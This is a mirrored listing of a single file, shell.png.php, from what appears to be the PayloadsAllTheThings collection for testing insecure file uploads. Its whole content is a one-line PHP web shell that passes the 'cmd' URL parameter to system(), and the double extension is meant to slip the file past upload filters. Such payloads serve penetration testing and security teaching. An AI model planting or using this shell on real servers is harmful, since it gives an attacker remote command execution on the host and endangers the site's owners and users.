1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-05-09 14:55:29 +02:00
PayloadsAllTheThings/Upload Insecure Files/Extension PHP/shell.png.php

1 line
43 B
PHP

<?php echo "Shell";system($_GET['cmd']); ?>